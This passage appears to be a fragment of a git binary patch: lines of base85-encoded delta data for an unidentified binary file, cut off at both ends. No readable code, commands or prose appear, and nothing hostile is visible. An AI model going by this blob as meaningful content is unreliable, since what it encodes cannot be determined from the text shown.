zP!F@!?+B!4qwD%ll(mr7^n)_zaX0s{CxIMbM-Fiq8~3bbH$N1{Zy05!R+Btgc~v7) zy7fk5$H1&g$+gc5l-N%I-CC}^FF!Y|OL+m88-)pv1tfyXzz`n|xD0U6EUlv^JD{*o7bgFV&EkeVCz?!J~6 z#2pj%l9CN~9xXSg|3F>j^9Hluv(5B(bAZF#1^wtXcR|YOk4X(YEbT#IJzbp23~g{= zb=kUaPy)2r{aNG_fI8meoy4%$jq@>Z274CUQewsi!mL8NAhir|EpBaq{4(aHH2%5h zvjO2!<2rD)3g(r6rM#81#)X`q=vH7Syrmt;gb-@T6Fm@Dnn43rvg@81mbQ1$sadvA3c;$@Rfzin2;kph0_ lmT?T8-Rf1cJ?QuSL$R}3IR%0XmKcVc3zmXHOhFv>{{eqz@Sy+z delta 11286 zcmaiaLv*G=*KH>q+vwP~(@A%1+qTV4p4jdrZ*1GPt&Z8TZQuU>bqD{q?%)pgS~aM1 z2DNML+I7xpzoM?XqOO7G1~}M%{D5k(0IbVBiPqed-Sj%7)WocM15OZZV0AFQ^Uvcr8iN$rurA zkDe&749g>iSR^$t02m*MBeqjIB=5>;nyJ6S`pNWHI%=~5-(;mLd(|}JZGe&TWgI_d+7ZJk5X@p5f!~iP2P- z)STKeW*X#ivaNN|J*#~d=p^_er+W-Pg;gkWkSdvQl6K;h@R3m}fY+k9R40-XJl^Ad zfp-PkJh5|P1!$=UAQC%3T}zQJ=HM*%1J~3KtADg^bh?k|Y>9%iY6xm=yy(9VXAslV zrHA|;`HRKg>>1dA538j~Z;bXZg?iuY2>$pZz|o!me)a=y*ATGOH)W2fl^Ah=X%NiG zl(i?liCYYT0rSZ%EPgF!dUs<}oJ)}z6X8q4mbA}<1I9#PJ%ItsTF{htgw%-MFMLno zU>BAq|B+4B=N;;Gl1Wis{1JCn)ZnQFCR1!g{u4gahY6`=v1J1)h&5aB0CdB5asg-@ zVPE+nAwv!9sia;LGub}$n}DgPV#T%$d&}+T8Ll!mqit^IUXNr0>&MFo6E9zp-UjJB z$+IOdz@bek{^jM4G7Y`2Jr>`HQLpI@(~uNX;n3buu;n@&`zB><*i^oR;AhiNI!xz8o`H* 
zfKypWp6)oAI)Bx!IGj*9uu^Xu%a>uyGi1dVn8<>UJmJSA7py2&QEZZAAV0%6GECpe z&}o1fZCtnwqH?XWH=x_G6SoFWrrchco5*3Vm!h@aNcRmUtYkQb_&MoAE^=*s(^_^S zOp%K5Wm0RfLZPHhZfjR3E}J?rkTKy6@>TFr8McT|uKcTqP1W_l{8B2b)CPWI!cc|iJ^6-=5mwK1)?|yD?*{#asVGxhVB6Jz<@8Q_@Yt10V zV}g3QGX*d0K~gnl7=JA+RN13=VN3`@)RqWYzCS}TkwkT{SHgQyW0ZGhW0ZseUz!7D zsz{(==^ffwFP>BW4j>HalETas2|tk10Og9Vs+qBT?uwmT z2p_2J1o9GOppJe$5^R*p1lfQOH1{?7bLQym&*z2 zB=(gV5jv@FnyKS!_>SLEoVR|DH=`*~nKK(PH^4z1_Ap*9U-TO>@g30LC1%F+u8>h~ zG|{U3PJ_Jo5l*T^(xY6}f8~scV4&Y|_Z??_?uaJSJf!jWt{~#lg!VgwB9O`oHY7Q! zlVdUU!t$lRMF>0OS)!}t9zIsd%{YR|w3iwvye&1nu^PkHlh=5u*x{2IH#8Yz9Fpj5 z%JwyA5#a-qnaI$}1XC6Z@L{>!i@<_KI+8Y@Z23#NLZuEMBOauyN(AGlGWK4PqSJGSD+f?mo4~-jtANX)=w*s(7i5D!^NHH12L9lwhmESlmHB8n-+IX^IfboT;r*oy9~>@9b~H zw>^$O!|GimbeIe)*1*D#>m@VGdBkY_a!h(P+S{PP

=V%$fQ4nWh*3`mm8g_gp40Ul#jE$2cPYz9tX^ifCvjL340)n1J(Gr%kMZD z?d!D+!pBIaAN+*G+TLCjg=TFSjB+5v6Gwv&L^;$KvVb&YlRl>@1jk3?yU(ko z7FlT}bP3H;o*tcLiB~vUBFjvyD*u#TBDJV-YabOTzL2R3!*$g1Ay?&*k9uuxlU3XH zU`Y#28ndi43PG*zxWGm$~R?`i!ZrUSE4B}RuyL%`5L?!8pg?q!?yALO+9*=nbTDwD(}W%q3v$VS$|FZ_ktDx+!AG0b&~kU&6V? zCkmBEuYy`{oRCxK?yXj+1FwVj_HCg_EBPPqPmf>G2kA-+;!(D0Rc75R>bP^c-rGsJ z8l_FmRvH-Zxgv^q$oaT?hrV}E_=O}d4l6lqC7%=(Si9X=y8Eco=wkBCA4;7^Osqvr zRwb5HJp(>3I^UQ9u^5Map?{~DDRo#?rBWcY^_wO|07{-=FY+kNOnk*;7$FiQqe3u^ z!Gz0$B~Z+@FD7!}o9XCBnsDTGshA#e9MXF`|7c8>?8S$cxNhyVMF!x?%30{LMgEZB z;6aUPhJ_3={EK^&{QPY4nnB#Ke$RM@fdBFGX727tdQ6{P5RHL~h>AQMMd7~v#6AX_cikX~z+~4Fit;amP~+2@DS8s=E?u8Ze2y?azzN?gKw z{862yQo}H31V2Cux}N?OU(n)DU$3pu3uKfl(&gdWcx!yqMn*I^x61t{P0-uX!5Lpe;=qW?mHFD~EuzXh0U_Zaa|9ee;2(`^$mGsjcP=X$3S_ zu%Kf`FA?I!?}2`e8efcCqwChhAvllWm}X89)c=}4e$f&o(|wgrW6?#*EP**U0{Go) zaoo85FNCX=FE(GXRX(wOrqtO>4s@CYxp3FYeMiwu{+~4n3ho&*Ba>BN70We+tA^Ly^*NuJ-L=p)_5&`=M@PGLF z4-o$V`43S40R0az%}64!qBMYgATz??<*x{QE?IPPicv~c2?pK9i|$p~)uezmk|aMR zucKz7Jx_jwaH*de%hT0v8P!;H>W`!!SGKLWdS_PZp1e&|`U%T(U2gFzd1d2SG;hhW zv!ae4S}yjY!lb?*zFxmPJ3Kvgn`O5P+A^C%PaaO4X`)LkLi4i^V}bx9JqFH0WBJLk zb1jxkF`&YFWYuH0PZIt=yuy9p@0=W5t@}aI3?9DIfs2lWG4%X zW*~)r#E&}?(lNPRfCeycg?7X$f;D1`6SP4R3TB7iAQ@s8wgKBYkvU@W`NDwm^%$a- z0%ib78DgCVq!1P&G~!FW%r9h21g{wf_Zs31lK?A3cSIF!%BRxp z#{Cl+9powPr_$V2Cvlk>quIdV_HR>b&>vi%_{mQ5WoV{-Vb^5z(fyoNBc{S*zaRTY zLipjvnWt>ekLs*+*P@&IUg5!Ywr)VTcCg<8*8ly-(@os4TNOYFzVw9CFDfIwn!Z4T zB|$}3DVR|s@%%EZS5j!84aIo#(D?X0Pm#g@?tJPZgN<;SeXFWj)+fBE`?YEPRobN_ zz3lPuVHNbl>v6a(bwE;OVP6#EV_bPww&=O)$QO%>NVd6sBlht9@o)o>_NGnqaQobe zU5d@?2D~>0ILqGrkCvvV#KS$>H-Rjsj|N*L+XfApJPTg@@@dcqTbs7(dHW}4)%ywE z*3u+PoA>ymp($|Qh78X9n`Q$} zThAQ2Tu_~gdmg>2TbZ?kNof_jqHaFIjer{!GO4FP@o(sOD_QUf@7~l z9m;Bfh--nQc|;P$G+F8x7mfbJ={Ih@g}logb~cY3RHZeFEC-~YUA&jlShVCZ%eQ-nGH5Fjv(~hi1zUQO2S^c~FtX-LD@l+yg!7%1m z=1{xGD*O8^ptgE2fe*_Fr$5mr zx-G5UMob2e9jKS~Q!Y#>Ak|1Fg=RCx>)TzVC_h2?V$1Ywnuv7@kJfJu`T2?3EOL$S zDl@t82rq*q(BeW!a9h2$%lol%?$3vC`R6~>g{UN3MPzmc0_p@<=LNCgf->oXq4o`< 
z9Q5eFn&Jk=(r9cAITA`6s)hJBPZTxX#yaxe^*hnNeSmcZ{RjrVI{&*c($;GN7-Ekf znDsU^y~zjrek|N>;Eb}`ClGUmq|v&9^sp;>dt2&@&m*MZcrgc#m#N>|{@lCO+n&^? zeq5|Mfu_v#xm2^|&I_4-d&-8krJA&sp4`xX`y4m^r$VR0d9RxIzf*mI6`RklU$56s z%bd2H?a#lFK+SpGp1xkdNI>aa)~NiYE^Dht`$}i_)NzaLL!~A?<&aFM>HYC~cREvf znUAb~^`-B<>dEPWK^I@O`)>M1;pyfa3x_#dIz4FD4R89DM93lK%1eIP-ZyNs5AV&k%Y)W>O&oR zF-8F#NK`R3ZzB^-T`|;zco=AJ(ln8v)CA2y%%4L9AkYV?c2u4McEgNcilBz_2}+T zCrg7qP_)~>ckaJxnYzDaBm0<9{-a1dZS-@OB7$&Qm?p07wO%XQw&Kk>lHvD%ySF$m z{~CT};7c{xOdXBNwok^}aOwMODxxhxKNMR^zBn+XL!)YAUxg=Aino23%Rj9i>%1qsaT6ZAUlYd}aw=d1lFqCvq6K2ruv8jI3s?io0*)}+ za1jQ^O2n{fyb;fYbkr!X8QfCf;{lrfN(Io$MQ9f3mp3-gWGkFzrt{l7Yf^1U?Hn#=J>xnP8+In(r< z7t`EY_Pc&2a&57LoIL(9#`#~)j;d-I3vuid_Cd%>mN+n2WGvGbAEwzSf*50)I^@EcaU!SN+l8*HuB zc4Jew^|~uQNr_0+S@LTN5fN1qKRS8QP@Ut6^kcKq z`gF8wb-aY0LIq!E*FY&1We-C3yDQC=BZ~)=l!s?Waxv3Y?aIPM*#4j*IYtrpw#uW~ zq%<2#yFG@$ZOK8W?|h}=MK9Rdk~-}=_wts*cMkjo(1Q3yF|6Wf7$lVDIqQmv{+un? zfnZIbDo>4V_l7d>$wH0y_p8|~9 ztssS27>y?(MUX|1qW1@dnS#s_TQ5{-uTB(fC-s?fEhT4(20ETf#ppn$VK$t$61+Kr zTaQKj>?$y|C~pm&&-3{mKGv=r@%^3jKSpu=6`u3!;T$DM%GeXEe zr%3Q!OcH-JN(jbfvJP_5mYl&@d`XQ}*cfk^XYbtndtoT7$&<-@!qcv>?xK=LSa*~W zgVs^d9+Wr-Ziqv#-bh$M4`e+T91~ti%uav&2{JG7!0W;N;p_SJ`*MlDR6<4eLef&Q z9ssGGEsr_sXWR@US1%@EuLC;g)55n}p&7Y_A+}q8n@z)2^R8li`fHsXl8;&!y6`*` zBK6(UXArC~n4C6(IffpabF*mnvm|9*3BTk($0*2!Av0GOK6!WgM+x}amSr{E zGqhqEKmp3~{(p2PVI$(7&IDh+Vzjzw7JQZlV62xZ%)BcT&om5pZLisXH(!oK zY`8L&JCLE=#ojM#kga}`UrOV@KUrU1o$d7D7CsRH4S5+BoDAIwy>T^{-M$&AyIw9t zCw?|=V4mK%wy!ldAqHBms4or40I{L6C91OK7Rb{vD&#s<57XZA&2w4WjT#5AO> z90Vy6#}NU#A`iq>0Ul#1@I4*>0UsnZcM@)LNQ;n^8GIz67F+Oc45U#g2xtZjHbk_d zAR2U`Ov{0ScnWl(WDNd4C2Z(I`lQ?z^E?F)4w!0ixlxL zpHqvVH4q~94}wIKzy}=6zU`D5%0$c3zP<9RD>X0hSN4X~U_`Gn9RHZ&Z)U?%ZlOvREmV$oOs=Jao?^nR5-g_F!vPxd5W@R5d7EL|;Excw zg+mr?=hDMH!3B4tYk^=w+h-4ip7wI8X*AT;erwBFLNgI6Mg*_4m+(3ghTl+97M?Q5 zu*vWvoN$ad@3B9MljE4`e=zvQWXSdFW;OTT0lDdQ2EwBvM;Wtg~gl@s2Gwz4(w}TRBk=KBOSll5N zX<-$7jPHvhk#A<(Ikd+|!I59TI$ zf0z6V*k}>NfHJ9^oW(_7xJf}_Pq;X{0D{0*Jshl9&8fOsg9_)IY^Y4WTP5)mXZEXp 
zXb1sgO9)E@=u+6#oJbfdd_PJJ2c^K!UNF`E2hzQq90OLXCkQqafDea?K7B+OrpKz^ zoUja)lEyQ&*8vurc&kPk%0aLuQ3Pomf+|aLz*-S1X9^qxI!l~x(wg4LfTNl+qoqf0 zm%QdXgz^_?Fl4=d9Vky&%{T#ZHb2@bP0Am6O@7UJo}9q_sXcvgm|4yB&HLcsjXr!$ z&e3nJ2|ufg-8e*EU;!cPF4K;9Asv@p&Ry$9n3Df% zyE9dQ+8wUNz*x4Mh&9h`CrCrZG#im^7XCi)M?r`t6S^Z^F)l~`W+cg94I$BN0%BwE zNu5groRm_G$zMP14Z{0xP7V;xY8IzW?DL84{NsWNj0+Ga0dQG7qr~i$h_8IpCt5cA zep$(q4mwAYhXr60c6D?|sqnw~7fVU)`v2nCnrSVDX>&n%dMwJm9;828wr|+R7w)Ef zcYm6TyuZkMKX840X%tWrP#g3WG{ED*f0%k>9OBCcnmub%vo}|p%-in|ZnoH5U#Bvk z|179_w??jH1F9d(ADxkF%LO+5tcZKc$y+-Hx}3Vhgp4}H-DT?XM?PK)ADGRvov1Vl z=tyM+D9_xq`F@=G`M2wR%;pIsHY)ZuoO3~ZV#SWNpY%km`nxREo;s7L+Pn##Nw(^k zUsRK;>wocspXUoYqw}JB2qr_REE`hOHLa{5NI=9O0_ev%2q<{yf_&q3NB4}>$m*+oU-!}4ohjG{2k(pc>1Ee&DOXrBeJ;qU zn;8ph#YaCWDPwOvt7n+7GeSup-wT!1RVl!+hlYa4=`<0QN*aIS4C<%JZT%;wx6nLm%RCR+d(aioV^F2;Utw8|2S(wNV-LiTkS`8v66-Uu$P&p-DNbJk#P zL_R)y_dT+uIaco zdNH=Pz1p5ehDPLi&~vm+%RwTX9F*5W8iDDw*J>;gv`+U)=X>) zqBNkoT0Xs-TMgzkv+VCn&`XGUH^IJ^)qqGny1)0L|(SlL_)1z9|WVB{w!Uuv=}{;OG4GJ?Mq*2F2=vtrbS;BE$t> zUkk%UIOWmX8)KJ}6BdRaEL~EAX~gY=PTvmFr)x#1eZ6;Z3;k3tp6lcJq6>T0xmn@O zHxvOs#+0*Gt??dS;Rn-n1cJPv{}evhI;q z0zX7pON`l7FU%;)a&j2EUB^t?0EG_M8!cOxd`!s!wTBArB2yF){Tlx_|?ogt@<%=EfxCvz%W-pzOKE@mgL_(oxNH$Pcj0J}L4 z$=3VM>XBN?xx{7+@`u7+sJ^|yXdFPlkyP*ew!|3u8P0ozj)+dtxYaQh-P78kwz=fhrBdeM4;8uBI^N#tFmh` zM8Gae`#2g$wy3I(tS~g0-Ti5dZ5cFgT;Jj72tFubWP#* zVng&bIa06}*^cxX2U+zgYz2S|&1VZ*8 zR)M~9`a-X()dG(NaH#bP+=)nR0H6D*(@=ACeBxAZ+l{(G!~_Lgm}nrkDwPY2Y#=XU zGXNQ>M0{ZLScP>+=vj}3yyQQq2+pXG54ZHPY^P8oJRKRp+`0lF)1NxX7bclFf9hAU zw29K3+t(SU(Z*)+c|JXP+DCAM(QWEiRCR&AvBHr8{#2@OaAi0=IT5qs3Wb!P8ci*y zHn79>`ylgaz(+yrHW)3E#kg$7oC3?TEL^lafi4SOx+YrYK6CNY!zeYR#w3!UZjhii zS#o<=iQ*?JO>5rZwa)X$!g0R7es3~W`uHSBmfm*&iw?;M{v!CnruY3_#b}%5b%0bv z5^EhO%D6H%_~0Z=!j*L%+=x>bN}}YrlgbMMQ>@?%pvJr&Rua{hr_&;oPa?|N=>FVk zwwc`B0FBcf`-qNWIO8aHFs6{|n!#0J$@Es!DkG$jDj-^aWDvRg-&c^@kI=fdsi4p= zCv481tr*3Ys#6vcNn<&88qJ<~)MadXzud{bdW*(LEBL}TMU88}YVKDSdiAoF*yU1U z(*N=f4j4o_b|RgWu}A=G=F*Kp%~t7{&!M+uqjx@MF|`wYo9(z>^30DtoZK+qdVjgu 
z28FS~(W=4D1qicO0LLjWk5HK6pq>-n*okYtm&;wM$8Mj7E#7YY;2}}w+0ViX*w%_` z$NFy|4&@bbU!`zmusZUo8jK=iscp++@uj|FhR-sBV$80 zW;PxULt}PMBV%r3BTg<8Zf-U%PE#`;ZlfQ3|Gym|cXl{&fbD;m9XJ*ilvNcmhOavX zTC%JS0{kN)0wRovmmz6sNyFeu5{&}G1gYKJ{WpxT-P}8Is$-^(0;@m1PH8;;T6)-L z>((^aZ8^+nT;do?=?31Tg3@FrdVZwD{&B#Xx?&q*5zC009*To}pUKW@;es!)nt~b*8ap~_3l03Fcw+obgufB3y%`8fRojtyJ4X}Zalc> z{v?!kV7aIMH>lB6On1M%XNMELQ5%{96mT@vQ)QA3ny9QwG12Cauo&H_uXx#?7?0HA zg!&9%5Y+Pf9OFt~P!*A`EWRqsqt-us>K>uvg#`{MD{n1A|KZ8vgSa0>==Yd^mFhvg z0~wckT)eDxvn7l{IFZJnO_zU8o3pD^MI7c|c19jbSDZE*xF`JKTqErK^Iq}?_#P^M zJdya9k9Kkdng!O?%;iQq58E{ac~_B^_t|(9%Jn94WKyyC<%i~>{+0(TmIC(t?>eNd z9YmeTdI$WXoGE9RlVk1J^pc>X8^!HpJdx>~r$ZLo^o^b-49tj(eC9>_#H#vl1v zI}|BmqSKjK*UlOdrW!HQj<_dyKz0~r3%>eaDV^X$$FFt+k}bH+f7RAQ)*PuW`uI~~ zu&-bU`*%IS<#%ZKqH#5%&9CV72HKy#5N)GR42(WuWN$nF@@Kln)Y~~e=FAdW%+!JZ z%8cTQtUpBOfmpobsuMWKjjn&IxzQhbg=n^oG`|&Q!|Te1ZG==+ROS5x8*n{^%D;H# z%Lw_yqTjJyf9^Sph#%ROziNQv*4I?x-NGM|f3X>Z;~$R`n5p<^i*cfN9x}U3;GJ`! zw2^(xjk2rYo^L0#p%v%=gVYZpGbA!EoAj@zgkNNo#vP2fQOWTMvc4u<8vLlDP^~iE zuaX{aVJvTww`t=ZKV0S01TqK;Ij8UTK|ZyWXY___pw>Put<`WeAKv wz%(+eJm5_2O#bhH@4uD3k=4I(UqdGs4<}PII8IJ(PHr|hC<+Quc`>;E1KJzMeE